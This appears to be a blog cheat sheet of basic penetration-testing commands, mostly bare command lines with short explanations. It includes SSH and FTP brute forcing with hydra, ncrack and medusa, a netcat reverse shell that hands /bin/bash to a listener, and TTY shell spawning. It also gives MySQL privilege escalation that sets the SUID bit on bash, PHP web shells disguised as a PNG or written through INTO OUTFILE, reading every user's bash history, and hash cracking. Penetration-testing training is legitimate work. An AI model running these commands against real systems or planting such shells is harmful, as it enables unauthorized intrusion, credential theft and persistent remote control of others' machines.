Basic Commands for Penetration Testers: Part 1

1. Bruteforce:

a) Hydra:

hydra -l root -P [Path_to_file] [IPAddress] ssh

l → enter username  or  L → Username File

p → enter password or   P → Password File


To Bruteforce ftp using password same as username and reverse of username:

hydra -l username -e nsr ftp://IP_Address

nsr for try username as:

n → null

s → same as username

r → reverse of username


b) Ncrack:

ncrack -p 22 –user <Usernames seperated by comma> -P [Path_to_Password_File] [IPAddress]


ncrack -p 22 -U <Usernames Filename> –pass [comma separated password list] [IPAddress]

p → port number


c) Medusa:

medusa -u [username] -P [Path_to_Password File] -h [IPAddress] -M ssh


medusa -U [username File] -p [Password] -h [IPAddress] -M ssh

M → Name of module eg: ssh


2. Find all the files in Linux with suid bit set

find [path_to_search] -perm /u=s

/          –> path to root directory

-perm      –> permission

/u=s        –> Here u is for owner of the file, s stands for suid bit

2>           –> ‘2’ is file descriptor for stderr and redirects ‘>’ them to null device file

/dev/null  –> Null device file


3. Find a file containing specific word in Linux

grep -rin ‘[path to search]’ -e ‘[word to search]’

-r refers to recursive

-i refers to ignore case (optional)

-n refers to line number of the file where specific word is found


4. enum4linux

Tool for enumerating information from Windows and Samba systems.

Usage: ./ [options] ip


5. nikto

Scan web server for known vulnerabilities and bruteforce directories. Always look for ssl certificate, if it is then try to connect to https

nikto -h [IPAddress|URL]


6. Listen on port using command:

nc -lvp [port]


7. Base 64 decode of any string:

echo [string] | base64 -d


8. Spawning a TTY shell

python -c ‘import pty; pty.spawn(“/bin/sh”)’

echo os.system(‘/bin/bash’)

/bin/sh -i

perl —e ‘exec “/bin/sh”;’


9. If the file ‘’ already exist on the system, get privilege escalation by using below mysql queries with example:

mysql> use mysql;

mysql> create function sys_exec returns integer soname ‘’;

mysql> select sys_exec(‘chmod u+s /bin/bash’);


10. Run sudo command as other user:

sudo -u username [command]


11. Search IP locally using command other than nmap:

netdiscover -r [IP-Range]


12. Source of PHP file by using the function ‘php://filter/convert.base64_encode/resource’ for any parameter in URL.


this gives source code for index.php file. Similarly we can extract other files too.


13. Create fake PNG file containing PHP code.


<?php system($_GET[“cmd”]) ?>


14. Execute bash command to give shell access to the listener:

nc -nv 4444 -e /bin/bash


15. Permanently set $PATH variable with some changes:

# add this command to `~/.profile` file

$ export PATH=$PATH:/myNewDir

# then run the source command

$ source ~/.profile


16. Using command line ‘dirb’ for bruteforcing directories and files

dirb [IP Address]:[port]


17. Download a file using wget

wget [http|https]://[IPAddress]:[port]/Folder/filename


18. Command to see file type:

file [filename]


19. Command to see only strings in file

strings [Filename]


20. WordPress scanner command:

wpscan –url

->Enumerate installed plugins …

wpscan –url –enumerate p

->Enumerate all plugins …

wpscan –url –enumerate ap

->Enumerate users …

wpscan –url –enumerate u

->Use a HTTP proxy …

wpscan –url –proxy


21. Searchspolit command to find exploits present in kali linux

searchsploit [searchpattern]


22. Crack the hash using ‘john’ command

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Where hash.txt -> file containing the hash t be cracked.


23. Connect to mysql using IP Address:

mysql –h [IP] -u [username] -p [password]


24. Read the bash history of all users while in /home directory

find -name “.bash_history” -exec cat {} \;

Here below refers to:

find -name –> finds all the files in /home directory recursively with “.bash_history” name

-exec –> executes the command given after that

{} –> Refers to the name of the files that were found


cat */.bash_history


25. sudo -l command use:

the -l (list) option will list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host.


26. WordPress users can upload a shell using INTO OUTfile.

select “<?php echo shell_exec($_GET[‘cmd’]);?>” into outfile “/var/www/https/[blog_folder]/wp-content/uploads/shell.php”;

Leave a Reply

Your email address will not be published. Required fields are marked *